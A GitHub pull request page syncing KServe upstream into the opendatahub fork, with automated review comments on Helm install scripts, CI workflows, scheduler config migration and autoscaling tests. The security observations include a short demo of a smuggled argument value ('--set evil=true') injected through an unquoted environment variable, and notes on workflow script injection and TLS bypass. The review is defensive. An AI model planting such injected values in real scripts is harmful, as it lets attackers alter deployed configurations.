
260424 sync upstream/master to odh/master #1445

Open
vivekk16 wants to merge 9 commits into opendatahub-io:master from vivekk16:260424_sync_upstream

Conversation


@vivekk16 vivekk16 commented Apr 24, 2026

As per title

Summary by CodeRabbit

Release Notes

  • New Features

    • Added multi-GPU vendor support for LLMInferenceService, enabling shared routing across NVIDIA and AMD GPUs.
    • Introduced HPA and KEDA autoscaling for LLMInferenceService workloads with comprehensive E2E testing.
    • Added configurable HTTP keep-alive timeout for REST servers.
  • Improvements

    • Updated PyTorch dependencies to version 2.11.0 and TorchVision to 0.26.0 for improved performance.
    • Enhanced scheduler configuration with updated plugin naming and disaggregated profile parameter handling.
  • Infrastructure

    • Added Prometheus and WVA integration for autoscaling observability and workload variant support.

pierDipi and others added 9 commits April 23, 2026 10:19

Signed-off-by: Pierangelo Di Pilato <pierdipi@redhat.com>
Signed-off-by: Dan Sun <dsun20@bloomberg.net>
…ve#5407)

Signed-off-by: Vivek Karunai Kiri Ragavan <vkarunai@redhat.com>

enforce gitaction have an issue so I manually merge this
Signed-off-by: James Ostrander <jostrand@redhat.com>
…serve#5433)

Signed-off-by: Vivek Karunai Kiri Ragavan <vkarunai@redhat.com>
Signed-off-by: Vivek Karunai Kiri Ragavan <vkarunai@redhat.com>

# Conflicts:
#	test/e2e/pytest.ini

openshift-ci Bot commented Apr 24, 2026

[APPROVALNOTIFIER] This PR is APPROVED

This pull-request has been approved by: vivekk16

The full list of commands accepted by this bot can be found here.

The pull request process is described here

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment


coderabbitai Bot commented Apr 24, 2026

📝 Walkthrough

Walkthrough

This pull request introduces comprehensive autoscaling support for KServe LLM InferenceService via HPA and KEDA pathways. It adds new Helm-based infrastructure management scripts for Prometheus, Prometheus Adapter, and Workload Variant Autoscaler (WVA) deployment. The scheduler configuration migration system now handles disaggregated profile parameter transformations and plugin renaming. E2E testing is expanded with matrix-driven autoscaling test jobs and a new quick-install workflow. Minor updates include container CLI argument flag changes (--connector to --kv-connector), REST server timeout configuration, and Python/Go dependency version pins.

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~50 minutes

Security observations

TLS verification bypass in configuration: Multiple new shell scripts (hack/setup/infra/manage.prometheus-helm.sh, hack/setup/infra/manage.wva-helm.sh, hack/setup/quick-install/llmisvc-autoscaling-*) configure tlsInsecureSkipVerify: true in Prometheus and WVA settings. This disables TLS certificate validation during Kubernetes cluster communication. In production environments, this creates exposure to man-in-the-middle attacks (CWE-295). Consider parameterizing this to false by default and requiring explicit opt-in.
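A minimal sketch of the suggested opt-in, assuming a hypothetical `TLS_INSECURE_SKIP_VERIFY` environment variable that the scripts would forward into the Helm values:

```shell
#!/bin/sh
# Hypothetical opt-in flag: secure by default; callers must explicitly
# set it to "true" to disable certificate validation.
TLS_INSECURE_SKIP_VERIFY="${TLS_INSECURE_SKIP_VERIFY:-false}"

# The value would then be forwarded to the chart, e.g.:
#   helm install ... --set "prometheus.tlsInsecureSkipVerify=${TLS_INSECURE_SKIP_VERIFY}"
echo "tlsInsecureSkipVerify=${TLS_INSECURE_SKIP_VERIFY}"
```

With the variable unset, the script prints the safe default, so only an explicit `TLS_INSECURE_SKIP_VERIFY=true` in the environment relaxes verification.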

Shell script credential/command injection risks: The new Helm management scripts use helm install with dynamic parameters sourced from environment variables without apparent quoting/escaping in several paths. For example, PROMETHEUS_URL and WVA_VERSION are interpolated into Helm --set flags. Malicious or accidental values in environment variables could alter deployed configurations. Verify that environment variable interpolation in helm install commands is properly quoted.
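The word-splitting hazard can be shown without invoking helm at all; the sketch below counts how many arguments a command actually receives when a hypothetical malicious URL value is interpolated unquoted versus quoted:

```shell
#!/bin/sh
# A hypothetical malicious value: a URL with an embedded extra flag.
PROMETHEUS_URL='http://prom:9090 --set evil=true'

count_args() { echo "$#"; }

# Unquoted: word splitting turns the one value into extra argv entries,
# smuggling a second --set flag into the command line.
unquoted_argc=$(count_args --set prometheus.url=$PROMETHEUS_URL)

# Quoted: the whole value stays a single argument, as helm expects.
quoted_argc=$(count_args --set "prometheus.url=${PROMETHEUS_URL}")

echo "unquoted=${unquoted_argc} quoted=${quoted_argc}"
```

The unquoted call receives four arguments instead of two, which is exactly how a poisoned environment variable alters a `helm install` invocation.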

Arbitrary code execution in test load generation: test/e2e/llmisvc/test_llm_autoscaling.py calls send_load() that issues unvalidated HTTP requests. Ensure request URLs and payloads are strictly validated and do not inherit user input without sanitization.

Missing input validation in scheduler migration: pkg/controller/v1alpha2/llmisvc/scheduler.go parses and transforms YAML configuration with new plugin/parameter migrations. The logic for disaggregated profile parameter restructuring should validate that intermediate YAML structures conform to expected schemas before mutation to prevent injection of malformed configurations.

🚥 Pre-merge checks | ✅ 3 | ❌ 1

❌ Failed checks (1 inconclusive)

Title check — ❓ Inconclusive
Explanation: The title describes a synchronization action (sync upstream/master to odh/master), which is a real, substantial part of the changeset; however, it does not convey the primary technical substance of the changes (autoscaling support, scheduler migrations, new workflows, etc.), making it overly broad and generic.
Resolution: Use a more specific title that highlights the main technical contribution(s), such as "Add LLMISvc autoscaling support with HPA and KEDA", or reference the primary domain changes rather than repository synchronization metadata.
✅ Passed checks (3 passed)
Description check — ✅ Passed (check skipped: CodeRabbit's high-level summary is enabled)
Linked Issues check — ✅ Passed (check skipped: no linked issues were found for this pull request)
Out of Scope Changes check — ✅ Passed (check skipped: no linked issues were found for this pull request)

✏️ Tip: You can configure your own custom pre-merge checks in the settings.


Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.


Comment @coderabbitai help to get the list of available commands and usage tips.

@vivekk16 vivekk16 requested review from Jooho and pierDipi April 24, 2026 18:32

jlost commented Apr 24, 2026

/retest


@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 19

Note

Due to the large number of review comments, Critical and Major severity comments were prioritized as inline comments.

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (2)
hack/setup/quick-install/kserve-knative-mode-dependency-install.sh (1)

647-668: ⚠️ Potential issue | 🟡 Minor

Dead autoscaling variables in a Knative-only install script (SC2034).

PROMETHEUS_VERSION, PROMETHEUS_ADAPTER_VERSION, PROMETHEUS_NAMESPACE, PROMETHEUS_ADAPTER_NAMESPACE, and WVA_NAMESPACE are declared but never consumed in this script — main() (Lines 1325-1360) only installs helm/kustomize/yq/cert-manager/istio/knative-operator. Since the file is auto-generated (Lines 19-24), fix it in the generator: either (a) only emit variables a given script actually uses, or (b) export defaults that are intentionally passed through to child processes, or annotate them with # shellcheck disable=SC2034. Otherwise every regeneration will keep tripping shellcheck.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/kserve-knative-mode-dependency-install.sh` around
lines 647 - 668, The file declares unused autoscaling variables
(PROMETHEUS_VERSION, PROMETHEUS_ADAPTER_VERSION, PROMETHEUS_NAMESPACE,
PROMETHEUS_ADAPTER_NAMESPACE, WVA_NAMESPACE) while main() only installs
knative-related components, which trips SC2034 on regen; update the generator
that emits this script so it either (a) only emits the variables actually
referenced by this Knative-only install script (remove PROMETHEUS_* and WVA_*
from output) or (b) marks intentionally-unused defaults so shellcheck stops
complaining (prefix with export or add a comment like “# shellcheck
disable=SC2034” next to the unused declarations), and ensure the generator logic
that produces KEDA_NAMESPACE, KSERVE_NAMESPACE, etc. continues to emit those
still in use (refer to the main() entrypoint in this script when deciding which
vars to include).
.github/workflows/e2e-test-quick-install.yaml (1)

30-190: ⚠️ Potential issue | 🟠 Major

Add explicit job permissions and use environment variables for event data.

None of the three jobs declare permissions: blocks. Each inherits the default GITHUB_TOKEN scope, allowing far more repository operations than needed (CWE-732). Additionally, ${{ github.event.pull_request.base.ref }} is interpolated directly in shell commands at lines 41, 44, 76, 79, 143, and 146, violating script injection safeguards (CWE-94). Store event data in environment variables and pass them safely to shell commands.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/workflows/e2e-test-quick-install.yaml around lines 30 - 190, The
jobs detect-changes, controller-image-build and test-quick-install currently
lack explicit minimal permissions and interpolate github.event data directly
into shell commands; add a permissions: block to each job (e.g., permissions:
contents: read) to restrict GITHUB_TOKEN scope and at the job level define
environment variables for event data (e.g., env: PR_BASE_REF: ${{
github.event.pull_request.base.ref || '' }} and EVENT_NAME: ${{
github.event_name }}), then update the "Merge target branch" step in each job
(the Merge target branch step that runs git fetch/merge) to use those env vars
($PR_BASE_REF and $EVENT_NAME) instead of inline ${{ ... }} to avoid script
injection and unsafe interpolation. Ensure the shell tests use quoted variables
and fallbacks when PR_BASE_REF is empty.
🟡 Minor comments (21)
charts/kserve-runtime-configs/files/llmisvcconfigs/resources.yaml-1626-1627 (1)

1626-1627: ⚠️ Potential issue | 🟡 Minor

Quote the version value to stay consistent with the sibling config.

config/llmisvcconfig/config-llm-scheduler.yaml (Line 26) uses "0.7.0" (quoted). Here it's bare. While 0.7.0 parses as a string in YAML (two dots ⇒ not numeric), leaving it unquoted invites future drift if someone changes it to 0.8 (which would parse as a float and break semver.NewVersion in pkg/controller/v1alpha2/llmisvc/scheduler.go).

Proposed fix
       annotations:
-        app.kubernetes.io/version: 0.7.0
+        app.kubernetes.io/version: "0.7.0"
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@charts/kserve-runtime-configs/files/llmisvcconfigs/resources.yaml` around
lines 1626 - 1627, The annotations entry uses an unquoted semantic version value
which risks being parsed as a number if changed (e.g., 0.8) and can break semver
parsing; update the annotations mapping key "app.kubernetes.io/version" in
resources.yaml to use a quoted string value (e.g., change 0.7.0 to "0.7.0") so
it matches the sibling config and always parses as a string for code like
pkg/controller/v1alpha2/llmisvc/scheduler.go that uses semver.NewVersion.
hack/setup/quick-install/llmisvc-dependency-install.sh-647-648 (1)

647-648: ⚠️ Potential issue | 🟡 Minor

PROMETHEUS_* and WVA_NAMESPACE variables are unused — either remove from generator output or export if downstream scripts depend on them.

Lines 647–648 and 666–668 define PROMETHEUS_VERSION, PROMETHEUS_ADAPTER_VERSION, PROMETHEUS_NAMESPACE, PROMETHEUS_ADAPTER_NAMESPACE, and WVA_NAMESPACE, but main() (lines 1238–1279) never references them and does not invoke any prometheus or wva installation. Since they are not exported, they won't propagate to any child shells either. These variables are dead code in this script and should be omitted from the generator (llmisvc-dependency-install.definition) unless downstream scripts in the same process require them—in which case, add export directives.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-dependency-install.sh` around lines 647 -
648, The PROMETHEUS_* and WVA_NAMESPACE variables (PROMETHEUS_VERSION,
PROMETHEUS_ADAPTER_VERSION, PROMETHEUS_NAMESPACE, PROMETHEUS_ADAPTER_NAMESPACE,
WVA_NAMESPACE) are defined but never used by main(); either remove these
variable declarations from the generator output
(llmisvc-dependency-install.definition) to eliminate dead code, or if downstream
scripts rely on them, change their declarations to exported form (export
PROMETHEUS_VERSION=... etc.) and ensure main() or the invoked child scripts
actually consume them (call or document the dependent install functions); update
the generator so the script contains only variables that are either exported or
referenced by main()/called functions.
hack/setup/quick-install/kserve-standard-mode-full-install-with-manifests.sh-3673-3674 (1)

3673-3674: ⚠️ Potential issue | 🟡 Minor

Quote the version string to preserve it as a string in YAML.

0.7.0 is fine as-is for a semver, but annotation values in Kubernetes must be strings, and some YAML parsers will happily turn an unquoted scalar that looks numeric-ish into something else on re-serialization. The consumer in pkg/controller/v1alpha2/llmisvc/scheduler.go is doing a string comparison for the migration gate — a parser quirk here would silently skip the migration path.

Proposed fix
       annotations:
-        app.kubernetes.io/version: 0.7.0
+        app.kubernetes.io/version: "0.7.0"
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/kserve-standard-mode-full-install-with-manifests.sh`
around lines 3673 - 3674, The YAML annotation value app.kubernetes.io/version
should be quoted to guarantee it is treated as a string (change
app.kubernetes.io/version: 0.7.0 to app.kubernetes.io/version: "0.7.0"); update
the manifest in kserve-standard-mode-full-install-with-manifests.sh so the
version is emitted as a quoted string to avoid YAML parsers converting it to a
non-string type, because pkg/controller/v1alpha2/llmisvc/scheduler.go relies on
a string comparison for the migration gate and could silently skip migration if
the annotation is not a string.
hack/setup/quick-install/kserve-standard-mode-full-install-with-manifests.sh-647-648 (1)

647-648: ⚠️ Potential issue | 🟡 Minor

Remove unused version variables or document their purpose.

PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION at lines 647–648 are defined but never referenced within this file. This is a manifest-based installer that does not perform Helm installations, so these version pins serve no function. Either remove them or, if they are required by an external caller or sourced helper, explicitly export them and document the dependency.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/kserve-standard-mode-full-install-with-manifests.sh`
around lines 647 - 648, PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION are
declared but never used; either remove these unused variables or make their
intent explicit by exporting them and adding a comment describing who consumes
them (e.g., external caller or sourced helper). Locate the two variables
PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION in the script and either
delete the declarations or change them to exported variables (export
PROMETHEUS_VERSION=... and export PROMETHEUS_ADAPTER_VERSION=...) and add a
one-line comment above explaining the external dependency that requires them.
docs/samples/llmisvc/multi-gpu-vendor/llm-inference-service-qwen2-7b-amd-no-scheduler.yaml-20-32 (1)

20-32: ⚠️ Potential issue | 🟡 Minor

Sample omits readiness/liveness probes and securityContext.

Users copy-paste docs samples verbatim into production. With no readinessProbe, the InferencePool will route traffic to pods before vLLM finishes loading the 7B Qwen weights (which can take minutes on ROCm), causing initial 5xx spikes. Consider adding probes consistent with the other fixtures in this PR (see test/e2e/llmisvc/fixtures.py:109-122) and a minimal securityContext (runAsNonRoot, no root FS writes) so the sample works on OpenShift SCCs without edits.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In
`@docs/samples/llmisvc/multi-gpu-vendor/llm-inference-service-qwen2-7b-amd-no-scheduler.yaml`
around lines 20 - 32, Add readiness and liveness probes and a minimal
securityContext to the container named "main" in the template so pods aren't
routed traffic before vLLM finishes loading and the sample works on OpenShift
SCCs; specifically, mirror the probes used in test/e2e/llmisvc/fixtures.py
(readiness probe that checks the inference health endpoint with an
initialDelaySeconds tuned for large model load times and a simple liveness HTTP
GET or tcp check) and add a securityContext with runAsNonRoot: true (and an
appropriate runAsUser if used elsewhere) plus a readOnlyRootFilesystem setting
to prevent root FS writes so the sample will run under OpenShift SCCs.
pkg/controller/v1alpha2/llmisvc/config_merge_test.go-1347-1414 (1)

1347-1414: ⚠️ Potential issue | 🟡 Minor

Test prescribes label-map union semantics — confirm this is the intended contract.

The "custom pool selector merge base selector" case asserts that when both base and override supply Selector.MatchLabels, the result is the union of all keys (llm-pool, kserve.io/component, x). This is what Kubernetes strategic merge patch does by default for maps, but the README for the multi-GPU-vendor sample relies on the override replacing the default workload selector, not augmenting it. If a base config ever sets the default app.kubernetes.io/name triplet and the user adds llm-pool: qwen2-7b, the merged selector will still include the default labels and the InferencePool will not match the AMD pods as documented. Consider adding a test case that mirrors the multi-GPU-vendor scenario (base = default triplet, override = custom labels) to pin down the actual behavior seen in production.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha2/llmisvc/config_merge_test.go` around lines 1347 -
1414, Add a new test case in config_merge_test.go mirroring the multi-GPU-vendor
scenario: create a base LLMInferenceServiceSpec whose
Scheduler.Pool.Spec.Selector.MatchLabels contains the default
app.kubernetes.io/name/app.kubernetes.io/instance triplet and an override spec
that only supplies {"llm-pool":"qwen2-7b"}; assert the merged result in the test
(for the relevant merge function exercised by these tests) contains the union of
labels (i.e., both the default triplet and "llm-pool": "qwen2-7b") so the actual
map-merge semantics for InferencePoolSpec.Selector.MatchLabels are pinned and
will surface if behavior changes. Ensure you reference the existing case "custom
pool selector merge base selector" and reuse
RouterSpec/SchedulerSpec/InferencePoolSpec/Selector.MatchLabels structures to
construct the new test entry.
docs/samples/llmisvc/multi-gpu-vendor/README.md-21-21 (1)

21-21: ⚠️ Potential issue | 🟡 Minor

Missing fenced code block language (MD040).

Line 21's ASCII architecture diagram block has no language tag. Mark it as text to silence markdownlint.

Proposed fix
-```
+```text
                          ┌──────────────┐
                          │   Gateway    │
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@docs/samples/llmisvc/multi-gpu-vendor/README.md` at line 21, The ASCII
architecture diagram fenced code block (the triple-backtick block showing the
Gateway diagram) is missing a language tag; update the opening fence from ``` to
```text so the block becomes a text fenced code block and resolves the MD040
markdownlint warning.
docs/samples/llmisvc/multi-gpu-vendor/README.md-104-111 (1)

104-111: ⚠️ Potential issue | 🟡 Minor

Fix incorrect scheduler component label in kubectl command.

Line 111's command uses app.kubernetes.io/component=llminferenceservice-scheduler, but the controller actually labels scheduler pods as app.kubernetes.io/component=llminferenceservice-router-scheduler (see pkg/controller/v1alpha2/llmisvc/scheduler.go:1354). The command will return no results unless corrected.

Additionally, line 105's verification command remains ambiguous: once the AMD instance overrides app.kubernetes.io/name to qwen2-7b-instruct-nvidia, both vendor pods match that label, defeating the verification intent. Show distinct selectors—by node affinity, GPU label, or deployment hash—to disambiguate which pods are running where.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@docs/samples/llmisvc/multi-gpu-vendor/README.md` around lines 104 - 111,
Update the README lines: correct the scheduler pod selector to use the actual
label key/value used by the controller
(app.kubernetes.io/component=llminferenceservice-router-scheduler as set in
scheduler.go at the scheduler creation) so the kubectl logs command returns
scheduler pods, and replace the ambiguous qwen2-7b-instruct-nvidia pod
verification selector with a disambiguating selector that targets
vendor-specific attributes (for example use nodeName/node affinity, the GPU
vendor label such as nvidia.com/gpu vs AMD label, or the
deployment/pod-template-hash annotation) so you can reliably confirm which
replicas are on which GPU nodes and verify InferencePool behavior.
hack/setup/quick-install/llmisvc-full-install-with-manifests.sh-647-648 (1)

647-648: ⚠️ Potential issue | 🟡 Minor

Remove unused PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION — they are never consumed.

These variables are defined but never referenced in this file. They appear to be copy-pasted from the *-dependency-install.sh variants, which use Helm to install Prometheus and pass these pins via --version. This script embeds manifests directly, so the pins are dead code. Keeping them creates false impression of version pinning without actually enforcing any constraint.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-full-install-with-manifests.sh` around lines
647 - 648, Remove the unused variable definitions PROMETHEUS_VERSION and
PROMETHEUS_ADAPTER_VERSION from the script: delete the lines that assign
PROMETHEUS_VERSION=83.4.0 and PROMETHEUS_ADAPTER_VERSION=5.3.0 and any now-stale
references to those variable names; if you intended to actually pin Prometheus
versions in this script, instead implement the explicit Helm/manifest pinning
logic (or move the pins back into the corresponding *-dependency-install.sh) so
that version variables are not left defined but unused.
hack/setup/infra/manage.wva-helm.sh-24-24 (1)

24-24: ⚠️ Potential issue | 🟡 Minor

Doc/default mismatch: http in the header, https in the code.

Line 24 documents the default as http://...:9090; line 49 actually uses https://...:9090. Combined with insecureSkipVerify=true on line 86, this silently disables TLS verification against a service that most in-cluster Prometheus deployments expose on plain HTTP. Pick one and make them consistent; if HTTP is acceptable inside the cluster, drop the insecureSkipVerify smell.

Also applies to: 49-49

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/infra/manage.wva-helm.sh` at line 24, The documentation and code
disagree on the default WVA_PROMETHEUS_URL (header shows http://..., but the
script uses https://...:9090 and sets insecureSkipVerify=true); update them to
be consistent by picking one approach: either change the documented default to
https://...:9090 to match the script, or change the script to use
http://...:9090 and remove the insecureSkipVerify usage; specifically edit the
WVA_PROMETHEUS_URL default value and the TLS verification flag
(insecureSkipVerify) references so the variable WVA_PROMETHEUS_URL and the TLS
handling are aligned.
hack/setup/infra/manage.wva-helm.sh-52-60 (1)

52-60: ⚠️ Potential issue | 🟡 Minor

uninstall force-deletes the entire namespace, not just the release.

If WVA_NAMESPACE was created or is shared by anything outside this Helm release (custom secrets, co-located workloads, operators), kubectl delete all --all + kubectl delete namespace --force --grace-period=0 will blow it away. At minimum, guard the namespace delete behind a label/annotation ownership check, or only run it when the namespace was created by this script (e.g., carries a kserve.io/managed-by=manage.wva-helm.sh label applied at install time).

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/infra/manage.wva-helm.sh` around lines 52 - 60, The uninstall()
function currently force-deletes everything in ${WVA_NAMESPACE}; change it to
only remove resources belonging to this Helm release and only delete the
namespace if it was created/owned by this script. Concretely: stop using kubectl
delete all --all; instead delete resources by release/helm labels (use -l
"app.kubernetes.io/instance=${WVA_RELEASE_NAME}" or the chart's release label)
and/or run helm uninstall "${WVA_RELEASE_NAME}" -n "${WVA_NAMESPACE}" (already
present) to remove release-managed objects; before calling kubectl delete
namespace "${WVA_NAMESPACE}" check the namespace's labels (e.g., require
kserve.io/managed-by=manage.wva-helm.sh) by querying kubectl get namespace
"${WVA_NAMESPACE}" -o jsonpath=... and only delete the namespace when that label
exists; otherwise skip namespace deletion and log a warning.
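A sketch of the label-gated delete, using the `kserve.io/managed-by=manage.wva-helm.sh` ownership label suggested above (which would have to be applied at install time); `kubectl` is stubbed here so the gating logic can be exercised without a cluster:

```shell
#!/bin/sh
WVA_NAMESPACE="wva-system"

# Stub for illustration only: pretend the ownership label is present.
kubectl() { echo "manage.wva-helm.sh"; }

owner=$(kubectl get namespace "${WVA_NAMESPACE}" \
  -o jsonpath='{.metadata.labels.kserve\.io/managed-by}')

if [ "${owner}" = "manage.wva-helm.sh" ]; then
  action="delete"   # safe: this script created the namespace
else
  action="skip"     # shared namespace: leave it alone and warn
fi
echo "namespace ${WVA_NAMESPACE}: ${action}"
```

Against a real cluster the stub would be dropped, and the `skip` branch would log a warning instead of force-deleting a namespace the script does not own.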
hack/setup/quick-install/kserve-standard-mode-dependency-install.sh-647-648 (1)

647-648: ⚠️ Potential issue | 🟡 Minor

Export PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION or remove them.

Lines 647–648 declare both variables but they are never used in this file. They are not exported, so child processes spawned from this script will not inherit them. If downstream Helm installation scripts (e.g., manage.prometheus-helm.sh, manage.prometheus-adapter-helm.sh) source this file or receive these vars, an undefined/empty value silently defaults to latest in helm install --version, breaking reproducibility and introducing supply-chain risk. Either export them if they are intended for child processes, or remove them if they are dead code.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/kserve-standard-mode-dependency-install.sh` around
lines 647 - 648, The two variables PROMETHEUS_VERSION and
PROMETHEUS_ADAPTER_VERSION are declared but not exported or used, causing child
processes (like manage.prometheus-helm.sh or manage.prometheus-adapter-helm.sh)
to see empty values and default to "latest"; either remove these dead variables
or export them so downstream scripts inherit explicit versions—update the file
to either delete the PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION
declarations if unused, or change them to exported variables (export
PROMETHEUS_VERSION=83.4.0 and export PROMETHEUS_ADAPTER_VERSION=5.3.0) so helm
install --version receives deterministic values.
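The inheritance problem is easy to demonstrate: a plain assignment is visible only to the current shell, while an exported one reaches child processes. The child shell below stands in for a helper such as manage.prometheus-helm.sh (version values taken from the script under review):

```shell
#!/bin/sh
# Unexported: visible only to this shell, invisible to children.
PROMETHEUS_VERSION="83.4.0"

# Exported: inherited by any child process this script spawns.
export PROMETHEUS_ADAPTER_VERSION="5.3.0"

# A child shell stands in for a downstream Helm helper script.
child_view=$(sh -c 'echo "${PROMETHEUS_VERSION:-unset} ${PROMETHEUS_ADAPTER_VERSION:-unset}"')
echo "child sees: ${child_view}"
```

The child resolves the unexported pin to its `unset` fallback, which is exactly how a downstream `helm install --version` would silently fall back to latest.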
hack/setup/quick-install/kserve-knative-mode-full-install-with-manifests.sh-647-648 (1)

647-648: ⚠️ Potential issue | 🟡 Minor

Remove or use unused version pins PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION (SC2034).

These variables are defined at lines 647–648 but never referenced in this script. Sibling -helm.sh and -dependency-install.sh scripts use them for Helm-based Prometheus deployment; this manifest-based script does not. Either remove them or integrate a Prometheus installation step that consumes them.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/kserve-knative-mode-full-install-with-manifests.sh`
around lines 647 - 648, The variables PROMETHEUS_VERSION and
PROMETHEUS_ADAPTER_VERSION are declared but never used; either remove these
unused variable declarations or wire them into a manifest-based Prometheus
install step so they are consumed. To fix, delete the PROMETHEUS_VERSION and
PROMETHEUS_ADAPTER_VERSION lines if this script will not install Prometheus, or
add a manifest apply/templating step (e.g., curl or kubectl apply of generated
YAML) that uses PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION to
fetch/render the correct Prometheus and adapter manifests (or pass them as vars
into a templating command) so the variables are actually referenced.
test/e2e/llmisvc/test_llm_autoscaling.py-919-946 (1)

919-946: ⚠️ Potential issue | 🟡 Minor

Replace the fixed time.sleep(5) with polling — guaranteed CI flake.

After patch_llmisvc there is no guarantee the controller has reconciled, re-synced the HPA/ScaledObject, and propagated maxReplicas=5 within 5 seconds. Under kubelet/apiserver load the next _get_custom_resource reads a stale maxReplicas=<old> and the test fails non-deterministically. Use the existing wait_for helper with an assertion on the expected value.

🛠️ Proposed fix (HPA; mirror for KEDA)
-        time.sleep(5)
-        assert_scaling_resources_exist(service_name, actuator="hpa")
-
-        hpa = _get_custom_resource(
-            HPA_GROUP,
-            HPA_VERSION,
-            HPA_PLURAL,
-            hpa_name(service_name),
-            KSERVE_TEST_NAMESPACE,
-        )
-        assert hpa is not None
-        assert hpa["spec"]["maxReplicas"] == 5, (
-            f"Expected maxReplicas=5 after update, got {hpa['spec']['maxReplicas']}"
-        )
+        def _max_is_five():
+            hpa = _get_custom_resource(
+                HPA_GROUP, HPA_VERSION, HPA_PLURAL,
+                hpa_name(service_name), KSERVE_TEST_NAMESPACE,
+            )
+            assert hpa is not None, "HPA not found"
+            assert hpa["spec"]["maxReplicas"] == 5, (
+                f"Expected maxReplicas=5, got {hpa['spec']['maxReplicas']}"
+            )
+        wait_for(_max_is_five, timeout=60, interval=2.0)

Also applies to: 993-1026

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@test/e2e/llmisvc/test_llm_autoscaling.py` around lines 919 - 946, Replace the
fixed time.sleep(5) after patch_llmisvc with a polling-based wait_for that
repeatedly calls _get_custom_resource (using HPA_GROUP/HPA_VERSION/HPA_PLURAL
and hpa_name(service_name)) and asserts hpa["spec"]["maxReplicas"] == 5, so the
test waits until the controller has reconciled; keep the existing
assert_scaling_resources_exist(service_name, actuator="hpa") check but remove
the unconditional sleep and use wait_for to avoid CI flakes.
pkg/controller/v1alpha2/llmisvc/scheduler.go-1124-1132 (1)

1124-1132: ⚠️ Potential issue | 🟡 Minor

Metric flags are stripped from container args before we confirm the plugin injection succeeded.

extractDeprecatedMetricFlags mutates d.Spec.Template.Spec.Containers[*].Args in place. If mutateSchedulerConfig subsequently no-ops (e.g. --config-text value isn't valid YAML — see lines 779–783 where the error is intentionally swallowed, or --config-file is used instead of --config-text), the CLI flags are gone and the core-metrics-extractor plugin never lands. Net effect on a v0.7 binary: scheduler starts with no custom metric specs and silently uses defaults.

Order the mutation first (accumulate the plugin), and only strip the flags once injection actually happened, or short-circuit when no --config-text arg is present.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha2/llmisvc/scheduler.go` around lines 1124 - 1132, The
call to extractDeprecatedMetricFlags currently mutates container args before
mutateSchedulerConfig runs, which can remove metric flags even when plugin
injection no-ops; change the flow so you first build/accumulate the
withCoreMetricsExtractorPlugin argument (call extractDeprecatedMetricFlags only
to compute the plugin payload without mutating in-place), invoke
mutateSchedulerConfig with withMigrateDisaggHeadersHandler,
withMigrateDisaggProfileHandler, WithRemoveHashBlockSize, and the prepared
withCoreMetricsExtractorPlugin, and only mutate (i.e., strip) container Args via
extractDeprecatedMetricFlags if mutateSchedulerConfig actually applied the
mutation (and short-circuit entirely when no --config-text arg is present on the
container to avoid stripping flags prematurely).
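For reference, the safe ordering described above is language-agnostic: compute the payload without mutating, attempt the injection, and strip only on success. A minimal Python sketch of that pattern (the `--metric-` flag prefix and the `inject` callback are hypothetical stand-ins for the real flags and mutateSchedulerConfig):

```python
def migrate_metric_flags(args, inject):
    """Strip deprecated metric flags only after their payload has
    actually been injected into the scheduler config.

    `inject` stands in for mutateSchedulerConfig: it receives the
    computed payload and returns True only if the mutation applied.
    The `--metric-` prefix is a hypothetical flag family.
    """
    if "--config-text" not in args:
        return args  # nothing to inject into; leave the flags alone
    payload = [a for a in args if a.startswith("--metric-")]
    if not payload:
        return args
    if inject(payload):
        # Injection succeeded: the CLI flags are now redundant.
        return [a for a in args if not a.startswith("--metric-")]
    # Injection no-oped (e.g. unparseable config): keep the flags so a
    # v0.7 binary still sees its metric specs.
    return args
```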
hack/setup/infra/manage.prometheus-adapter-helm.sh-60-68 (1)

60-68: ⚠️ Potential issue | 🟡 Minor

Existence check matches on substring, not release name.

helm list ... | grep -q "prometheus-adapter" returns true for any release whose name contains prometheus-adapter (e.g. my-prometheus-adapter-dev). Uninstall on line 54 then targets the literal prometheus-adapter, so the detected release is never actually removed and the helm install below fails. Use helm status or helm list -q with an anchored match.

🛠️ Proposed fix
-    if helm list -n "${PROMETHEUS_ADAPTER_NAMESPACE}" 2>/dev/null | grep -q "prometheus-adapter"; then
+    if helm status prometheus-adapter -n "${PROMETHEUS_ADAPTER_NAMESPACE}" >/dev/null 2>&1; then
🤖 Prompt for AI Agents
